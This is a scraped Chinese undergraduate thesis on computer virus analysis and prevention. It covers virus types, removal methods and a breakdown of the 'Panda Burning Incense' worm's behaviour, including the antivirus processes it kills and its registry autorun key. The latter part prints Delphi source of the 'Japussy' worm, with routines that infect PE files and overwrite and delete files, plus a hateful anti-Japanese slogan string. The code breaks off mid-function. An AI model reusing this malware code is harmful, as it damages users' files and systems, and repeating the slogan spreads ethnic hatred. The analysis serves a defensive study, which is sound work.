畢業(yè)設(shè)計(jì)（論文）計(jì)算機(jī)病毒解析與防范

1、陜西師范大學(xué)網(wǎng)絡(luò)教育學(xué)院畢業(yè)論文（設(shè)計(jì)）論文題目 計(jì)算機(jī)病毒解析與防范 姓 名 學(xué) 號(hào) 專 業(yè) 計(jì)算機(jī)科學(xué)與技術(shù) 批次/層次 指導(dǎo)教師 學(xué)習(xí)中心 目 錄摘要.31 引言.32 正文.32.1 計(jì)算機(jī)病毒的概述.32.1.1 計(jì)算機(jī)病毒的定義.42.1.2 計(jì)算機(jī)病毒的特性.42.2 計(jì)算機(jī)病毒的分類.42.2.1 計(jì)算機(jī)病毒的基本分類.42.3 計(jì)算機(jī)病毒防范和清除的基本原則和技術(shù).62.3.1 計(jì)算機(jī)病毒防范的概念和原則.62.3.2 計(jì)算機(jī)病毒防范基本技術(shù).62.3.3 清除計(jì)算機(jī)病毒的基本方法. 62.4 典型計(jì)算機(jī)病毒的原理、防范和清除.62.4.1 引導(dǎo)區(qū)計(jì)算機(jī)病毒.72.4.2 文

2、件型計(jì)算機(jī)病毒.72.4.3 腳本型計(jì)算機(jī)病毒.82.4.4 特洛伊木馬計(jì)算機(jī)病毒.82.4.5 蠕蟲計(jì)算機(jī)病毒.9 2.5 “熊貓燒香”病毒剖析.9 2.6 計(jì)算機(jī)主要檢測技術(shù)和特點(diǎn).263 參考資料.27 計(jì)算機(jī)病毒與防范 摘要目前計(jì)算機(jī)的應(yīng)用遍及到社會(huì)的各個(gè)領(lǐng)域，同時(shí)計(jì)算機(jī)病毒也給我們帶來了巨大的破壞和潛在的威脅，因此為了確保計(jì)算機(jī)能夠安全工作，計(jì)算機(jī)病毒的防范工作，已經(jīng)迫在眉睫。分析了計(jì)算機(jī)病毒的特點(diǎn)，討論了主要從及時(shí)清除計(jì)算機(jī)病毒、局域網(wǎng)病毒的防范、加強(qiáng)計(jì)算機(jī)網(wǎng)絡(luò)管理、個(gè)人用戶的防范，這幾個(gè)方面去進(jìn)行計(jì)算機(jī)病毒的有效防范。關(guān)鍵詞:計(jì)算機(jī)病毒 防范1 引言隨著計(jì)算機(jī)在社會(huì)生活各個(gè)領(lǐng)域的

3、廣泛應(yīng)用，計(jì)算機(jī)病毒攻擊給我們的日常生活和工作中帶來了很多的威脅，對于大多數(shù)計(jì)算機(jī)用戶來說，談到“計(jì)算機(jī)病毒”似乎覺得它深不可測，無法琢磨，其實(shí)計(jì)算機(jī)病毒是可以預(yù)防的，為了確保計(jì)算機(jī)使用的安全性，對計(jì)算機(jī)進(jìn)行防范措施是很重要的，本文對此問題進(jìn)行了探討。2 正文 21計(jì)算機(jī)病毒的概述隨著社會(huì)的不斷進(jìn)步，科學(xué)的不斷發(fā)展，計(jì)算機(jī)病毒的種類也越來越多，但終究萬變不離其宗！ 2.1.1計(jì)算機(jī)病毒的定義一般來講，凡是能夠引起計(jì)算機(jī)故障，能夠破壞計(jì)算機(jī)中的資源（包括硬件和軟件）的代碼，統(tǒng)稱為計(jì)算機(jī)病毒。而在我國也通過條例的形式給計(jì)算機(jī)病毒下了一個(gè)具有法律性、權(quán)威性的定義：“計(jì)算機(jī)病毒，是指編制或者在計(jì)算機(jī)程

4、序中插入的破壞計(jì)算機(jī)功能或者毀壞數(shù)據(jù)，影響計(jì)算機(jī)使用，并能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼。” 2.1.2計(jì)算機(jī)病毒的特性 1、隱藏性與潛伏性 計(jì)算機(jī)病毒是一種具有很高編程技巧、短精悍的可執(zhí)行程序。它通常內(nèi)附在正常的程序中，用戶啟動(dòng)程序同時(shí)也打開了病毒程序。計(jì)算機(jī)病毒程序經(jīng)運(yùn)行取得系統(tǒng)控制權(quán)， 可以在不到1秒鐘的時(shí)間里傳染幾百個(gè)程序。而且在傳染操作成后，計(jì)算機(jī)系統(tǒng)仍能運(yùn)行，被感染的程序仍能執(zhí)行，這就是計(jì)機(jī)病毒傳染的隱蔽性計(jì)算機(jī)病毒的潛伏性則是指，某些編制巧的計(jì)算機(jī)病毒程序，進(jìn)入系統(tǒng)之后可以在幾周或者幾個(gè)月甚至年內(nèi)隱藏在合法文件中，對其它系統(tǒng)文件進(jìn)行傳染，而不被人發(fā)現(xiàn)。 2、傳染性 計(jì)算機(jī)病

5、毒可通過各種渠道(磁盤、共享目錄、郵件)從已被感染的計(jì)算機(jī)擴(kuò)散到其他機(jī)器上，感染其它用戶在某情況下導(dǎo)致計(jì)算機(jī)工作失常。3、表現(xiàn)性和破壞性任何計(jì)算機(jī)病毒都會(huì)對機(jī)器產(chǎn)生一定程的影響，輕者占用系統(tǒng)資源，導(dǎo)致系統(tǒng)運(yùn)行速度大幅降低重者除文件和數(shù)據(jù)，導(dǎo)致系統(tǒng)崩潰。4、可觸發(fā)性病毒 具有預(yù)定的觸發(fā)條件，可能是時(shí)間、日期、文類型或某些特定數(shù)據(jù)等。一旦滿足觸發(fā)條件，便啟動(dòng)感染或破壞作，使病毒進(jìn)行感染或攻擊；如不滿足，繼續(xù)潛伏。有些病毒針對特定的操作系統(tǒng)或特定的計(jì)算機(jī)。5、欺騙性和持久性計(jì)算機(jī)病毒行動(dòng)詭秘，計(jì)算機(jī)對其反應(yīng)遲，往往把病毒造成的錯(cuò)誤當(dāng)成事實(shí)接受下來。病毒程序即使被發(fā)，已被破壞的數(shù)據(jù)和程序以及操作系統(tǒng)都

6、難以恢復(fù)。在網(wǎng)絡(luò)操作情況下，由于病毒程序由一個(gè)受感染的拷貝通過網(wǎng)絡(luò)系統(tǒng)反復(fù)傳，病毒程序的清除愈加復(fù)雜。 除了上述五點(diǎn)外，計(jì)算機(jī)病毒還具有不可預(yù)見性、衍生性、針對性、等特點(diǎn)。正是由于計(jì)算機(jī)病毒具有這些特點(diǎn)，給計(jì)算機(jī)病毒的預(yù)防、檢測與清除工作帶來了很大的難度。 2.2計(jì)算機(jī)病毒的分類 2.2.1計(jì)算機(jī)病毒的基本分類1、傳統(tǒng)開機(jī)型計(jì)算機(jī)病毒純粹的開機(jī)型計(jì)算機(jī)病毒多利用軟盤開機(jī)時(shí)侵入計(jì)算機(jī)系統(tǒng)，然后再伺機(jī)感染其他的軟盤或者硬盤，例如：“stoned 3”（米開朗基羅）。2、隱形開機(jī)型計(jì)算機(jī)病毒 此類計(jì)算機(jī)病毒感染的系統(tǒng)，再行檢查開機(jī)區(qū)，得到的將是正常的磁區(qū)資料，就好像沒有中毒一樣，此類計(jì)算機(jī)病毒不容易

7、被殺毒軟件所查殺，而防毒軟件對于未知的此類型計(jì)算機(jī)病毒，必須具有辨認(rèn)磁區(qū)資料真?zhèn)蔚哪芰Α４祟愑?jì)算機(jī)病毒已出現(xiàn)的尚有“fish”. 3、檔案感染型兼開機(jī)型計(jì)算機(jī)病毒 檔案感染型兼開機(jī)型計(jì)算機(jī)病毒時(shí)利用檔案感染時(shí)司機(jī)感染開機(jī)區(qū)，因而具有雙中的行動(dòng)能力，此類型較著名的計(jì)算機(jī)病毒有“cancer”。4、目錄型計(jì)算機(jī)病毒本類型計(jì)算機(jī)病毒的感染方式非常獨(dú)特，“dir2”即其代表，此類計(jì)算機(jī)病毒僅修改目錄區(qū)（root），便可達(dá)到其感染目的。 5、傳統(tǒng)檔案型計(jì)算機(jī)病毒傳統(tǒng)檔案型計(jì)算機(jī)病毒最大的特征，便是將計(jì)算機(jī)病毒本身植入檔案，使檔案膨脹，以達(dá)到散播傳染的目的。代表有“13 firday”。6、千面人計(jì)算機(jī)病

8、毒 千面人計(jì)算機(jī)病毒是指具有自我編碼能力的計(jì)算機(jī)病毒，“1701 下雨”等，為這種類型主要代表，此種計(jì)算機(jī)病毒編碼的目的，是使其感染的每一個(gè)檔案，看起來皆不一樣，干擾殺毒軟件的偵測，不過千面人計(jì)算機(jī)病毒仍會(huì)留下的這個(gè)“小辮子”，將其繩之以法。 7、突變引擎病毒有鑒于前面人計(jì)算機(jī)病毒一個(gè)接一個(gè)被截獲，邊有人編寫出一種突變式計(jì)算機(jī)病毒，使原本千面人計(jì)算機(jī)病毒無法解決的程序開頭相同的問題得到克服，并編寫成obj副程序，供他人植草此類計(jì)算機(jī)病毒，即 mctation engine。盡管如此，這類計(jì)算機(jī)病毒僅干擾了掃毒式軟件，對其他方式的防毒軟件并沒有太大的影響。8、隱形檔案型計(jì)算機(jī)病毒 此類病毒可以避

9、開去多防毒軟件，因?yàn)殡[形計(jì)算機(jī)病毒能直接植入dos系統(tǒng)的作業(yè)環(huán)境中，當(dāng)外部程序呼叫dos中斷服務(wù)時(shí)，便同時(shí)執(zhí)行到計(jì)算機(jī)病毒本身，使得計(jì)算機(jī)病毒能從容地將受其感染的檔案，粉飾成正常無毒的樣子。此類計(jì)算機(jī)病毒有“4096” 等。 9、終結(jié)型計(jì)算機(jī)病毒 終結(jié)性計(jì)算機(jī)病毒能追蹤磁盤操作終端的原始進(jìn)入點(diǎn)，當(dāng)計(jì)算機(jī)病毒取得磁盤原始中斷時(shí)，便可任意再磁盤上修改資料或普哦壞資料，而不會(huì)驚動(dòng)防毒程序，這就是說，裝有防毒程序和美妝防毒程序的情況是一樣的危險(xiǎn)。這類計(jì)算機(jī)病毒有的采用int 1單步執(zhí)行的方式，逐步追蹤磁盤中斷的過程，找出bios磁盤中斷的部分，供計(jì)算機(jī)病毒內(nèi)部使用；有的采用死機(jī)的方式，記錄幾個(gè)bios

10、版本的磁盤中斷原始進(jìn)入點(diǎn)，當(dāng)計(jì)算機(jī)病毒遭到熟悉的bios版本，便可直接呼叫磁盤中斷，對磁盤予取予求；有的則分析磁盤中斷的程序片段，找出bios中的相似部分便可直接呼叫磁盤中斷。其代表有“hammer 6”等。 10、word巨集計(jì)算機(jī)病毒 word 巨集計(jì)算機(jī)病毒可以說時(shí)目前最新的計(jì)算機(jī)病毒種類了，它是文件型計(jì)算機(jī)病毒，異于以往以感染磁盤區(qū)或可執(zhí)行的檔案為主的計(jì)算機(jī)病毒，此類病毒時(shí)利用word 提供的巨集功能來感染文件。目前已經(jīng)在internet及bbs網(wǎng)絡(luò)中發(fā)現(xiàn)不少word巨集計(jì)算機(jī)病毒，而且此類計(jì)算機(jī)病毒是用類似basic程序編寫出來的，易學(xué)，其反戰(zhàn)速度一定很快。 2.3計(jì)算機(jī)病毒防范和清

11、除的基本原則和技術(shù) 2.3.1計(jì)算機(jī)病毒防范的概念和原則計(jì)算機(jī)病毒防范，是指通過建立合理的計(jì)算機(jī)病毒防范體系和制度，即使發(fā)現(xiàn)計(jì)算機(jī)病毒入侵，并采取有效的手段阻止計(jì)算機(jī)病毒的傳播和破壞，回復(fù)受影響的計(jì)算機(jī)系統(tǒng)和數(shù)據(jù)。原則以防御計(jì)算機(jī)病毒為主動(dòng)，主要表現(xiàn)在檢測行為的動(dòng)態(tài)性和防范方法的廣譜性。2.3.2計(jì)算機(jī)病毒防范基本技術(shù) 計(jì)算機(jī)病毒預(yù)防是在計(jì)算機(jī)病毒尚未入侵或剛剛?cè)肭?，就攔截、阻擊計(jì)算機(jī)病毒的入侵或立即警報(bào)。目前在預(yù)防計(jì)算機(jī)病毒工具中采用的主要技術(shù)如下： 2.3.3清除計(jì)算機(jī)病毒的基本方法 1.簡單的工具治療簡單工具治療是指使用debug等簡單的工具，借助檢測者對某種計(jì)算機(jī)病毒的具體知識(shí)，從感染

12、計(jì)算機(jī)病毒的軟件中摘除計(jì)算機(jī)代碼。但是，這種方法同樣對檢測者自身的專業(yè)素質(zhì)要求較高，而且治療效率也較低。 2.專用工具治療使用專用工具治療被感染的程序時(shí)通常使用的治療方法。專用計(jì)算機(jī)治療工具，根據(jù)對計(jì)算機(jī)病毒特征的記錄，自動(dòng)清除感染程序中的計(jì)算機(jī)病毒代碼，使之得以恢復(fù)。使用專用工具治療計(jì)算機(jī)病毒時(shí)，治療操作簡單、高效。從探索與計(jì)算機(jī)病毒對剛的全過程來看，專用工具的開發(fā)商也是先從使用簡單工具進(jìn)行治療開始，當(dāng)治療獲得成功后，再研制相應(yīng)的軟件產(chǎn)品，使計(jì)算機(jī)自動(dòng)地完成全部治療操作。 2.4 典型計(jì)算機(jī)病毒的原理、防范和清除 2.4.1引導(dǎo)區(qū)計(jì)算機(jī)病毒系統(tǒng)引導(dǎo)區(qū)時(shí)在系統(tǒng)引導(dǎo)的時(shí)候，進(jìn)入到系統(tǒng)中，獲得對系

13、統(tǒng)的控制權(quán)，在完成其自身的安裝后才去引導(dǎo)系統(tǒng)的。稱其為引導(dǎo)區(qū)計(jì)算機(jī)病毒時(shí)因?yàn)檫@類計(jì)算機(jī)病毒一般是都侵占系統(tǒng)硬盤的主引導(dǎo)扇區(qū)i/o分區(qū)的引導(dǎo)扇區(qū)，對于軟盤則侵占了軟盤的引導(dǎo)扇區(qū)。它會(huì)感染在該系統(tǒng)中進(jìn)行讀寫操作的所有軟盤，然后再由這些軟盤以復(fù)制的方式和引導(dǎo)進(jìn)入到其他計(jì)算機(jī)系統(tǒng)，感染其他計(jì)算機(jī)的操作系統(tǒng)。如何檢測呢？1. 查看系統(tǒng)內(nèi)存的總量與正常情況進(jìn)行比較2. 檢查系統(tǒng)內(nèi)存高端的內(nèi)容3. 檢查系統(tǒng)的int 13h中斷向量4. 檢查硬盤的主引導(dǎo)扇區(qū)、dos分區(qū)引導(dǎo)扇區(qū)以及軟盤的引導(dǎo)扇區(qū)清除：用原來正常的分區(qū)表信息或引導(dǎo)扇區(qū)信息，覆蓋掉計(jì)算機(jī)病毒程序。此時(shí)，如果用戶事先提取并保存了自己硬盤中分區(qū)表的信

14、息和dos分區(qū)引導(dǎo)扇區(qū)信息，那么，恢復(fù)工作變得非常簡單?？梢灾苯佑胐ebug將這兩種引導(dǎo)扇區(qū)的內(nèi)容分別調(diào)入內(nèi)存，然后分別回它的原來位置，這樣就消除了計(jì)算機(jī)病毒。 2.4.2文件型計(jì)算機(jī)病毒文件型計(jì)算機(jī)病毒程序都是依附在系統(tǒng)可執(zhí)行文件或覆蓋文件上，當(dāng)文件裝入系統(tǒng)執(zhí)行的時(shí)候，引導(dǎo)計(jì)算機(jī)病毒程序也進(jìn)入到系統(tǒng)中。只有極少計(jì)算機(jī)病毒程序感染數(shù)據(jù)文件。此類病毒感染對象大多是系統(tǒng)的可執(zhí)行文件，也有一些還要對覆蓋文件進(jìn)行傳染，而對數(shù)據(jù)進(jìn)行傳染的則少見。清除：1. 確定計(jì)算機(jī)病毒程序的位置，是駐留在文件尾部還是在文件首部。2. 找到計(jì)算機(jī)病毒程序的首部位置（對應(yīng)于在文件尾部駐留方式），或者尾部位置（對應(yīng)于在文件

15、首部駐留方式）。3. 恢復(fù)原文件頭部的參數(shù)。4. 修改文件長度，將源文件寫回。2.4.3腳本型計(jì)算機(jī)病毒主要采用腳本語言設(shè)計(jì)的病毒稱其為腳本病毒。實(shí)際上在早期的系統(tǒng)中，計(jì)算機(jī)病毒就已經(jīng)開始利用腳本進(jìn)行傳播和破壞，不過專門的腳本病毒并不常見。但是在腳本應(yīng)用無所不在的今天，腳本病毒卻成為危害最大，最為廣泛的病毒，特別是當(dāng)他和一些傳統(tǒng)的惡性病毒相結(jié)合時(shí)，其危害就更為嚴(yán)重了。其主要有兩種類型，純腳本型，混合型。它的特點(diǎn)：l 編寫簡單l 破壞力大l 感染力強(qiáng)l 傳播范圍大（多通過e-mail，局域網(wǎng)共享，感染網(wǎng)頁文件的方式傳播）l 計(jì)算機(jī)病毒源碼容易被獲取，變種多l(xiāng) 欺騙性強(qiáng)l 使得計(jì)算機(jī)病毒生產(chǎn)機(jī)事先

16、起來非常容易清除：l 禁用文件系統(tǒng)對象filesystemobjectl 卸載windows scripting hostl 刪除vbs，vbe，js，jse文件后綴與應(yīng)用程序映射l 在windows目錄中，找到wscript.exe，更改名稱或者刪除l 要徹底防止vbs網(wǎng)絡(luò)蠕蟲病毒，還需要設(shè)置一下瀏覽器l 禁止oe的自動(dòng)收發(fā)電子郵件功能l 顯示所有文件類型的擴(kuò)展名稱l 將系統(tǒng)的網(wǎng)絡(luò)連接的安全級(jí)別設(shè)置至少為“中等” 2.4.4特洛伊木馬計(jì)算機(jī)病毒特洛伊木馬也叫黑客程序或后門病毒，是指吟唱在正常程序中的一段具有特殊功能的程序，其隱蔽性及好，不易察覺，是一種極為危險(xiǎn)的網(wǎng)絡(luò)攻擊手段。 其第一代：偽裝

17、性病毒，第二代：aids型木馬，第三代：網(wǎng)絡(luò)傳播性木馬如何檢查？l 稽查注冊表l 檢查你的系統(tǒng)配置文件l 清除：l 備份重要數(shù)據(jù)l 立即關(guān)閉身背電源l 備份木馬入侵現(xiàn)場l 修復(fù)木馬危害 2.4.5 蠕蟲計(jì)算機(jī)病毒蠕蟲是一種通過網(wǎng)絡(luò)傳播的惡性計(jì)算機(jī)病毒，它具有計(jì)算機(jī)病毒的一些共性，如傳播性、隱蔽性、破壞性等。同時(shí)自己有自己一些特征，如利用文件寄生，對網(wǎng)絡(luò)造成拒絕服務(wù)以及和黑客技術(shù)相結(jié)合等。簡單點(diǎn)說，蠕蟲就是使用危害的代碼來攻擊網(wǎng)絡(luò)上的受害主機(jī)，并在受害主機(jī)上自我復(fù)制，再攻擊其他的受害主機(jī)的計(jì)算機(jī)病毒。其特征：l 自我繁殖l 利用軟件漏洞l 造成網(wǎng)絡(luò)擁堵l 消耗系統(tǒng)資源l 留下安全隱患清除：l 與

18、防火墻互動(dòng)l 交換機(jī)聯(lián)動(dòng)l 通知hids（基于主機(jī)的入侵檢測）l 報(bào)警 2.5 “熊貓燒香”病毒剖析 “熊貓燒香”病毒感染機(jī)理:“熊貓燒香”，是一個(gè)感染型的蠕蟲病毒，它能感染系統(tǒng)中exe，com，pif，src，html，asp等文件，它還能中止大量的反病毒軟件進(jìn)程并且會(huì)刪除擴(kuò)展名為gho的文件，該文件是一系統(tǒng)備份工具ghost的備份文件，使用戶的系統(tǒng)備份文件丟失。被感染的用戶系統(tǒng)中所有.exe可執(zhí)行文件全部被改成熊貓舉著三根香的模樣。 1:拷貝文件病毒運(yùn)行后,會(huì)把自己拷貝到c:windowssystem32driversspoclsv.exe 2:添加注冊表自啟動(dòng)病毒會(huì)添加自啟動(dòng)項(xiàng)hkey_

19、current_usersoftwaremicrosoftwindowscurrentversionrun svcshare - c:windowssystem32driversspoclsv.exe 3:病毒行為a:每隔1秒尋找桌面窗口,并關(guān)閉窗口標(biāo)題中含有以下字符的程序： qqkav、qqav、防火墻、進(jìn)程、virusscan、網(wǎng)鏢、殺毒、毒霸、瑞星、江民、黃山ie、超級(jí)兔子、優(yōu)化大師、木馬克星、木馬清道夫、qq病毒、注冊表編輯器、系統(tǒng)配置實(shí)用程序、卡巴斯基反病毒、symantec antivirus、duba、esteem proces、綠鷹pc、密碼防盜、噬菌體、木馬輔助查找器、sys

20、tem safety monitor、wrapped gift killer、winsock expert、游戲木馬檢測大師、msctls_statusbar32、pjf(ustc)、icesword，并使用的鍵盤映射的方法關(guān)閉安全軟件icesword。添加注冊表使自己自啟動(dòng)hkey_current_usersoftwaremicrosoftwindowscurrentversionrun svcshare - c:windowssystem32driversspoclsv.exe并中止系統(tǒng)中以下的進(jìn)程: mcshield.exe、vstskmgr.exe、naprdmgr.exe、updat

21、erui.exe、tbmon.exe、scan32.exe、ravmond.exe、ccenter.exe、ravtask.exe、rav.exe、ravmon.exe、ravmond.exe、ravstub.exe、kvxp.kxp、kvmonxp.kxp、kvcenter.kxp、kvsrvxp.exe、kregex.exe、uihost.exe、trojdie.kxp、frogagent.exe、logo1_.exe、logo_1.exe、rundl132.exe。b:每隔18秒點(diǎn)擊病毒作者指定的網(wǎng)頁,并用命令行檢查系統(tǒng)中是否存在共享，共存在的話就運(yùn)行net share命令關(guān)閉admin

22、$共享。c:每隔10秒下載病毒作者指定的文件,并用命令行檢查系統(tǒng)中是否存在共享，共存在的話就運(yùn)行net share命令關(guān)閉admin$共享。d:每隔6秒刪除安全軟件在注冊表中的鍵值。并修改以下值不顯示隱藏文件 hkey_local_machinesoftwaremicrosoftwindowscurrentversionexploreradvancedfolderhiddenshowall checkedvalue - 0x00 刪除以下服務(wù): navapsvc、wscsvc、kpfwsvc、sndsrvc、ccproxy、ccevtmgr、ccsetmgr、spbbcsvc、symantec

23、 core lc、npfmntor mskservice、firesvc。e:感染文件 病毒會(huì)感染擴(kuò)展名為exe,pif,com,src的文件,把自己附加到文件的頭部，并在擴(kuò)展名為htm,html, asp,php,jsp,aspx的文件中添加一網(wǎng)址，用戶一但打開了該文件，ie就會(huì)不斷的在后臺(tái)點(diǎn)擊寫入的網(wǎng)址，達(dá)到增加點(diǎn)擊量的目的,但病毒不會(huì)感染以下文件夾名中的文件： window、winnt、system volume information、recycled、windows nt、windowsupdate、windows media player、outlook express、inter

24、net explorer、netmeeting、common files、complus applications、messenger、installshield installation information、msn、microsoft frontpage、movie maker、msn gamin zone 。g:刪除文件 病毒會(huì)刪除擴(kuò)展名為gho的文件，該文件是一系統(tǒng)備份工具ghost的備份文件使用戶的系統(tǒng)備份文件丟失。 “熊貓燒香”病毒核心源碼用 delphi 寫 program japussy; uses windows, sysutils, classes, graphics,

25、shellapi, registry; const headersize = 82432; /病毒體的大小 iconoffset = $12eb8; /pe文件主圖標(biāo)的偏移量 /在我的delphi5 sp1上面編譯得到的大小，其它版本的delphi可能不同 /查找2800000020的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量 headersize = 38912; /upx壓縮過病毒體的大小 iconoffset = $92bc; /upx壓縮過pe文件主圖標(biāo)的偏移量 /upx 1.24w 用法: upx -9 -8086 japussy.exe iconsize = $2e8; /pe文件主圖標(biāo)

26、的大小-744字節(jié) icontail = iconoffset + iconsize; /pe文件主圖標(biāo)的尾部 id = $44444444; /感染標(biāo)記 /垃圾碼，以備寫入 catchword = if a race need to be killed out, it must be yamato. + if a country need to be destroyed, it must be japan! + * w32.japussy.worm.a *; $r *.res function registerserviceprocess()function registerservicep

27、rocess(dwprocessid, dwtype: integer): integer; stdcall; external kernel32.dll; /函數(shù)聲明 var tmpfile: string; si: startupinfo; pi: process_information; isjap: boolean = false; /日文操作系統(tǒng)標(biāo)記 判斷是否為win9x function iswin9x()function iswin9x: boolean; var ver: tosversioninfo; begin result := false; ver.dwosversio

28、ninfosize := sizeof(tosversioninfo); if not getversionex(ver) then exit; if (ver.dwplatformid = ver_platform_win32_windows) then /win9x result := true; end; 在流之間復(fù)制 procedure copystream(src: tstream; sstartpos: integer; dst: tstream; dstartpos: integer; count: integer); var scurpos, dcurpos: integer;

29、 begin scurpos := src.position; dcurpos := dst.position; src.seek(sstartpos, 0); dst.seek(dstartpos, 0); dst.copyfrom(src, count); src.seek(scurpos, 0); dst.seek(dcurpos, 0); end; 將宿主文件從已感染的pe文件中分離出來，以備使用 procedure extractfile(filename: string); var sstream, dstream: tfilestream; begin try sstream :

30、= tfilestream.create(paramstr(0), fmopenread or fmsharedenynone); try dstream := tfilestream.create(filename, fmcreate); try sstream.seek(headersize, 0); /跳過頭部的病毒部分 dstream.copyfrom(sstream, sstream.size - headersize); finally dstream.free; end; finally sstream.free; end; except end; end; 填充startupi

31、nfo結(jié)構(gòu) procedure fillstartupinfo(var si: startupinfo; state: word); begin si.cb := sizeof(si); si.lpreserved := nil; si.lpdesktop := nil; si.lptitle := nil; si.dwflags := startf_useshowwindow; si.wshowwindow := state; si.cbreserved2 := 0; si.lpreserved2 := nil; end; 發(fā)帶毒郵件 procedure sendmail; begin /哪

32、位仁兄愿意完成之？ end; 感染pe文件 procedure infectonefile(filename: string); var hdrstream, srcstream: tfilestream; icostream, dststream: tmemorystream; iid: longint; aicon: ticon; infected, ispe: boolean; i: integer; buf: array0.1 of char; begin try /出錯(cuò)則文件正在被使用，退出 if comparetext(filename, japussy.exe) = 0 then

33、 /是自己則不感染 exit; infected := false; ispe := false; srcstream := tfilestream.create(filename, fmopenread); try for i := 0 to $108 do /檢查pe文件頭 begin srcstream.seek(i, sofrombeginning); srcstream.read(buf, 2); if (buf0 = #80) and (buf1 = #69) then /pe標(biāo)記 begin ispe := true; /是pe文件 break; end; end; srcstr

34、eam.seek(-4, sofromend); /檢查感染標(biāo)記 srcstream.read(iid, 4); if (iid = id) or (srcstream.size 10240) then /太小的文件不感染 infected := true; finally srcstream.free; end; if infected or (not ispe) then /如果感染過了或不是pe文件則退出 exit; icostream := tmemorystream.create; dststream := tmemorystream.create; try aicon := tic

35、on.create; try /得到被感染文件的主圖標(biāo)(744字節(jié))，存入流 aicon.releasehandle; aicon.handle := extracticon(hinstance, pchar(filename), 0); aicon.savetostream(icostream); finally aicon.free; end; srcstream := tfilestream.create(filename, fmopenread); /頭文件 hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsha

36、redenynone); try /寫入病毒體主圖標(biāo)之前的數(shù)據(jù) copystream(hdrstream, 0, dststream, 0, iconoffset); /寫入目前程序的主圖標(biāo) copystream(icostream, 22, dststream, iconoffset, iconsize); /寫入病毒體主圖標(biāo)到病毒體尾部之間的數(shù)據(jù) copystream(hdrstream, icontail, dststream, icontail, headersize - icontail); /寫入宿主程序 copystream(srcstream, 0, dststream, he

37、adersize, srcstream.size); /寫入已感染的標(biāo)記 dststream.seek(0, 2); iid := $44444444; dststream.write(iid, 4); finally hdrstream.free; end; finally srcstream.free; icostream.free; dststream.savetofile(filename); /替換宿主文件 dststream.free; end; except; end; end; 將目標(biāo)文件寫入垃圾碼后刪除 procedure smashfile(filename: string

38、); var filehandle: integer; i, size, mass, max, len: integer; begin try setfileattributes(pchar(filename), 0); /去掉只讀屬性 filehandle := fileopen(filename, fmopenwrite); /打開文件 try size := getfilesize(filehandle, nil); /文件大小 i := 0; randomize; max := random(15); /寫入垃圾碼的隨機(jī)次數(shù) if max 5 then max := 5; mass :

39、= size div max; /每個(gè)間隔塊的大小 len := length(catchword); while i max do begin fileseek(filehandle, i * mass, 0); /定位 /寫入垃圾碼，將文件徹底破壞掉 filewrite(filehandle, catchword, len); inc(i); end; finally fileclose(filehandle); /關(guān)閉文件 end; deletefile(pchar(filename); /刪除之 except end; end; 獲得可寫的驅(qū)動(dòng)器列表 function getdrives()function getdrives: string; var disktype: word; d: char; str: string; i: integer; begin for i := 0 to 25 do /遍歷26個(gè)字母 begin d := chr(i + 65); str := d + :; disktype := getdrivetype(pchar(str); /得到本地磁盤和網(wǎng)絡(luò)盤 if (disktype = drive_fixed) or (disktype = d